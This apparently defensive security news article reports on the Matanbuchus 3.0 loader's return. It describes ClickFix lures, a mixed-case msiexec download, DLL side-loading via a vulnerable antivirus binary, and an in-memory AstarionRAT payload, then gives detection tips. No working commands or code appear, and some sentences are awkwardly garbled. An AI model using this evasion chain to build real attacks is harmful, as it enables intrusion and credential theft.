After a nearly year-long break, the premium malware-as-a-service loader Matanbuchus reappeared in February 2026 This article explores premium malware service. . Version 3.0, the most recent iteration, has a completely rewritten code and charges a subscription fee of up to $15,000 per month, which is a significant increase over the initial pricing.

This change indicates a move away from mass spam campaigns and toward high-value targeted operations. In order to trick users into manually executing malicious commands under the pretense of fixing fictitious software updates or browser errors, the malware makes use of the persistent "ClickFix" social engineering technique. Instead of taking advantage of software flaws, the attack vector manipulates human trust to get around conventional security measures. Deceptive prompts are shown to victims, telling them to copy and paste particular PowerShell or Run dialog commands.

Backslashes and path traversal sequences are used by the malicious URL to trick logging systems. Many common email and perimeter defenses are circumvented because the user technically starts the process. When the command is run, a silent installation process that doesn't have a visible user interface is started.

According to Huntress analysts, this campaign immediately after infection releases a payload known as AstarionRAT, which has never been seen before. Credential theft and SOCKS5 proxying are two of the twenty-four unique commands that this custom remote access trojan has. The effect is frequently instantaneous, as operators target domain controllers by moving laterally across the network in less than forty minutes. Early detection is crucial for enterprise security teams because the ultimate objective seems to be ransomware deployment or data exfiltration.

The Chain of Silent Infection To avoid automated detection, the infection mechanism is intricately layered. The victim starts it by running a mixed-case msiexec command that retrieves a payload from a recently registered domain. When the installer runs, it inserts a malicious DLL and a legitimate but vulnerable Zillya Antivirus binary into phony directories that look like "AegisLynx" or "DocuRay."

Matanbuchus 3.0 advertisement (Source: Huntress) The malware extracts a password-protected archive containing the next stage components using a modified version of the 7-Zip utility in order to further conceal its operations. The antivirus engine then side-loads the malicious DLL in order to decrypt the Matanbuchus loader.

An overview of the Matanbuchus DLL graph (Source: Huntress) In the end, this intricate chain starts an embedded Lua interpreter that runs the last AstarionRAT payload straight into memory, leaving the fewest forensic remnants for investigators to discover on the disk. Endpoint detection systems should be set up by security teams to highlight msiexec commands that contain mixed-case characters or questionable URL patterns. Verifying network connections to recently registered domains and keeping an eye out for the creation of odd directories in %APPDATA% are crucial.

Lastly, teach staff members to avoid pasting raw commands into their terminals. To receive more real-time updates, set ZeroOwl as a preferred source on Google and use LinkedIn and X.